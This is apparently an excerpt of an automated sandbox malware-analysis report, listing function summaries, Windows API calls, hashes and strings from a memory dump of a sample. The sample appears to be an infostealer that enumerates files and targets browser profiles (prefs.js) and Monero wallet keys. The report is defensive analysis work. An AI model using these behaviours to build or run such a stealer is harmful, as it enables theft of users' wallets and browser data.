                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                    • Instruction ID: fda08bea7a7377850ac70992260fc8ed6d0a70d10086858a961417ce3bbaf0f7
                                    • Opcode Fuzzy Hash: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                    • Instruction Fuzzy Hash: 225143B2550218AFC724EBB0DC89BED737CBB94301F444599F61DA2190EB749BC88F92
                                    Function 00C43EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C43EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C43EDA
                                    • StrCmpCA.SHLWAPI(?,00C50FAC), ref: 00C43F08
                                    • StrCmpCA.SHLWAPI(?,00C50FB0), ref: 00C43F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4406C
                                    • FindClose.KERNEL32(000000FF), ref: 00C44081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: d7380254acc4a9e0fe6fffd6fa9507c43e38a8be3382c8b8263b9b051e54673e
                                    • Instruction ID: e15ac7b7fea8b75190069160d230e665734425f5aa783811955751221cacef27
                                    • Opcode Fuzzy Hash: d7380254acc4a9e0fe6fffd6fa9507c43e38a8be3382c8b8263b9b051e54673e
                                    • Instruction Fuzzy Hash: 975166B2900218AFDB24FBB1DC85EFE737CBB94300F044598B65DA6040DB759B898F55
                                    Function 00C3ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00C3ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00C3ED55
                                    • StrCmpCA.SHLWAPI(?,00C51538), ref: 00C3EDAB
                                    • StrCmpCA.SHLWAPI(?,00C5153C), ref: 00C3EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 00C3F2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: a2dc0c77194b3e865a951bdd1923189c539e1955ab2a11b27541413ca7bfa215
                                    • Instruction ID: c90318334bd68be7631cac20649ba34647e7d6320c80811fdffaf9d20bd66810
                                    • Opcode Fuzzy Hash: a2dc0c77194b3e865a951bdd1923189c539e1955ab2a11b27541413ca7bfa215
                                    • Instruction Fuzzy Hash: DEE1C172951218AAFB54FB61DC52EEE7338FF54300F4145A9B50A62092EF306F8ADF52
                                    Function 00C3F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C515B8,00C50D96), ref: 00C3F71E
                                    • StrCmpCA.SHLWAPI(?,00C515BC), ref: 00C3F76F
                                    • StrCmpCA.SHLWAPI(?,00C515C0), ref: 00C3F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00C3FAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: e82a525782b1dbe0e4e9ac28b5688fc184496b1ae9ffe3d53a9193b91fd5ebd6
                                    • Instruction ID: ce60286ecaf54352c400ec3d6ef6586eed2758cfe666bafb22a56272c0b7325f
                                    • Opcode Fuzzy Hash: e82a525782b1dbe0e4e9ac28b5688fc184496b1ae9ffe3d53a9193b91fd5ebd6
                                    • Instruction Fuzzy Hash: EAB135719501189FEB24FF61DC56BEE7379BF94300F4085A8E80A96191EF305B4ADF92
                                    Function 00C316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C5510C,?,?,?,00C551B4,?,?,00000000,?,00000000), ref: 00C31923
                                    • StrCmpCA.SHLWAPI(?,00C5525C), ref: 00C31973
                                    • StrCmpCA.SHLWAPI(?,00C55304), ref: 00C31989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C31D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C31DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C31E20
                                    • FindClose.KERNEL32(000000FF), ref: 00C31E32
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 0aecccb04745fe0a132b0b93b095192a34a05f7090a50b2fcd39f22282db6e45
                                    • Instruction ID: fdec33b041c14b9581fbc0c9109d3d91e4ab8e44855bb5a9eedb08c0f5d1414b
                                    • Opcode Fuzzy Hash: 0aecccb04745fe0a132b0b93b095192a34a05f7090a50b2fcd39f22282db6e45
                                    • Instruction Fuzzy Hash: 9A120F71950118ABEB19FB60DC96EEE7378FF54300F4145A9B50A62091EF306F89DFA2
                                    Function 00C3DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C50C2E), ref: 00C3DE5E
                                    • StrCmpCA.SHLWAPI(?,00C514C8), ref: 00C3DEAE
                                    • StrCmpCA.SHLWAPI(?,00C514CC), ref: 00C3DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 00C3E3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 4c09be76860beb4be9f20ab8666e7eb43e49e01939a1d5cca75cf107dd9a0f18
                                    • Instruction ID: 111795a56ab692dda2279b2e851379373de36c8f767597a4cd725cb923326205
                                    • Opcode Fuzzy Hash: 4c09be76860beb4be9f20ab8666e7eb43e49e01939a1d5cca75cf107dd9a0f18
                                    • Instruction Fuzzy Hash: 79F1B1718641189AEB25FB61DC95EEE7338FF54304F8141E9B41A62091EF306F8ADF62
                                    Function 00FFEB58 Relevance: 14.2, Strings: 10, Instructions: 1658COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %;U$>Qm$@T[?$Qhw2$Qhw2$iq$q-w$*xk$89?$twf
                                    • API String ID: 0-2086535159
                                    • Opcode ID: f81ac385b1f4190c931435667f4da205058c52ca5d2cb38b05790ec58768633d
                                    • Instruction ID: ded5ad2c5cf5dad108db245c93f5dcd98e8ac0b2870612a30738474dccda3892
                                    • Opcode Fuzzy Hash: f81ac385b1f4190c931435667f4da205058c52ca5d2cb38b05790ec58768633d
                                    • Instruction Fuzzy Hash: CEB228F360C2049FE304AE29EC8567AFBE9EF94720F16493DEAC4C3744EA3558058697
                                    Function 00C3DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C514B0,00C50C2A), ref: 00C3DAEB
                                    • StrCmpCA.SHLWAPI(?,00C514B4), ref: 00C3DB33
                                    • StrCmpCA.SHLWAPI(?,00C514B8), ref: 00C3DB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3DDCC
                                    • FindClose.KERNEL32(000000FF), ref: 00C3DDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: e3038d64ad225fc0ea0da398b119e0bd378e8190b4498a9b296e9cfbfd3b19e4
                                    • Instruction ID: fc0bc6d1fd09dfed5cc20187a2ba5ae2c52d1dd8e3e6b1238503808740756472
                                    • Opcode Fuzzy Hash: e3038d64ad225fc0ea0da398b119e0bd378e8190b4498a9b296e9cfbfd3b19e4
                                    • Instruction Fuzzy Hash: C4915172910104ABDB14FBB1EC96AED737DBB84304F408668FC1A96181EE349B5DDB93
                                    Function 0100C25F Relevance: 11.6, Strings: 8, Instructions: 1617COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .N$3ee[$5 ^$>v{u$U*&B$U!M$0;7$G[~
                                    • API String ID: 0-4104747061
                                    • Opcode ID: a304f02f334dd3b03d21618f2b92d49457ce04f7a9c586f0285932926706c7af
                                    • Instruction ID: 4af9b91850291e7b62571bf3fd58bd55b33bc28df9fe4db1a472326656f95121
                                    • Opcode Fuzzy Hash: a304f02f334dd3b03d21618f2b92d49457ce04f7a9c586f0285932926706c7af
                                    • Instruction Fuzzy Hash: FAB217F360C2049FE304AE2DEC8567AFBE9EF94720F16463DEAC583744EA3558058693
                                    Function 00C47B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00C505AF), ref: 00C47BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C47BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C47C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C47C62
                                    • LocalFree.KERNEL32(00000000), ref: 00C47D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
